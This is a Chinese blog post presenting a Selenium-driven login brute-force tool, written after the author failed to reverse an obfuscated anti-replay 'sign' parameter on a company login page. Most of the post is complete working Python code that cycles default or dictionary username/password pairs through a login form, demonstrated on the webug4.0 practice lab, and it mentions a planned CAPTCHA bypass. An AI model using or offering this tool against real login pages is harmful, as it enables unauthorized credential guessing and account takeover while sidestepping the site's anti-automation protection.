selenium自动化爆破

发表于 | 分类于
字数统计: 841

selenium自动化爆破工具

某一天测试公司某个业务的时候发现,虽然页面没有验证码,但是抓包之后一直有个sign值,而且每次的会话这个值都会变,改了之后后端会报错提示 sign值不合法。

我这暴脾气,立马看源码就准备逆了它,看着就来气。调了半天,woc全tm混淆的,代码读的我眼睛疼。算了,此处不留爷,自有留爷处,从界面下手,直接自动化爆破算了。

虽然网上已经有很多同类的东西了,但自己造轮子才能提高啊,就着手写了。

基础知识+环境配置

我是mac的环境,使用python2.7+chromedriver实现
首先使用homebrew安装chromedriver
brew cask install chromedriver
pip install selenium

至此,环境准备结束,该补充selenium的知识了。

官方手册送上:https://selenium-python.readthedocs.io/
核心知识:
1.elementLocation
2.webdriver

本次的工具主要使用到了元素定位和部分webdriver的功能

过程

本次用webug4.0靶场的登录做例子,其他都一样。

定位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector

下面是查找多个元素(这些方法将返回一个列表):
find_elements_by_name
find_elements_by_xpath
find_elements_by_link_text
find_elements_by_partial_link_text
find_elements_by_tag_name
find_elements_by_class_name
find_elements_by_css_selector

username框直接根据name获取定位

password用id或者class定位

1
2
3
username = driver.find_element_by_name("username")
password = driver.find_element_by_id("doc-ipt-pwd-1")
login_button = driver.find_element_by_class_name("am-btn")

判断跳转

我的逻辑是判断当前的url和我爆破的url是否是同一个,不是的话说明账号密码正确
driver.current_url获取当前URL

效果

速度挺快的,胜在少了逆sign等操作,后续加入bypass极验功能

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#coding:utf-8
from selenium import webdriver
import time
import sys
import os

url = "http://172.16.173.159/control/login.php"
sample_user = ['admin','admin123','root','administrator','guest','Admin']
sample_pass = ['admin123','123456','a123456','1234abcd','Qwer1234','admin']
driver = webdriver.Chrome()
driver.get(url)
# driver.find_element_by_css_selector(".js_show_pwd_panel").click()


# def Buster():
# 	fopen("")

def getElement():
	status = False
	try:
		# username = driver.find_element_by_name("loginUserName")
		# password = driver.find_element_by_name("loginPassword")
		username = driver.find_element_by_name("username")
		password = driver.find_element_by_id("doc-ipt-pwd-1")
		# login_button = driver.find_element_by_id("sublogin")
		login_button = driver.find_element_by_class_name("am-btn")
		status = True
	except Exception as e:
		raise e
	return status,username,password,login_button



def normal_test(sample_user,sample_pass):
	for i in sample_user:
		for j in sample_pass:
			status,username,password,login_button = getElement()
			if status:
				username.clear()
				username.send_keys(i)
				# time.sleep(2)
				password.clear()
				password.send_keys(j)
				# print "success " + str(i)
				login_button.click()
				if driver.current_url != url:
					print '\033[32m[*]Username/Passwprd : %s/%s  success' % (i,j)
				else:
					print '\033[32m[*]Username/Passwprd : %s/%s  fail' % (i,j)
					print "\033[0;37;40m\tHello World\033[0m"
				
			else:
				print "get element error~"

			time.sleep(0.5)


def dict_test(users,passwds):
	total = len(users)*len(passwds)
	current = 1
	page_status = False
	for user in users:
		for passwd in passwds:
			status,username,password,login_button = getElement()
			if status:
				username.clear()
				username.send_keys(user.strip())
				# time.sleep(2)
				password.clear()
				password.send_keys(passwd.strip())
				# print "success " + str(i)
				login_button.click()
				if driver.current_url != url:
					page_status = True
					print "\033[31m[*]"+"Username/Passwprd [%s/%s]: %s/%s  success" % (current,total,user.strip(),passwd.strip())
				else:
					print "\033[32m[*]"+"Username/Passwprd [%s/%s]: %s/%s  fail" % (current,total,user.strip(),passwd.strip())
				
			else:
				print "get element error~"
			current = current+1
			# time.sleep(0.5)

		
def main():
	# normal_test(sample_user,sample_pass)
	if len(sys.argv) !=3:
		print "\t Usage: python rpoBuster.py <userlist> <passwordlist>\n"
		sys.exit(1)
	try:
		users = open(sys.argv[1], "r").readlines()	
	except(IOError):
		print "[-] Error: Check your userlist path\n"
		sys.exit(1)
	try:
		passwds = open(sys.argv[2], "r").readlines()
	except(IOError): 
		print "[-] Error: Check your passwordlist path\n"
		sys.exit(1) 
	
	# print len(users)*len(passwds)
	# for i in users:
	# 	print i.strip()
	dict_test(users,passwds)

if __name__ == '__main__':
	main()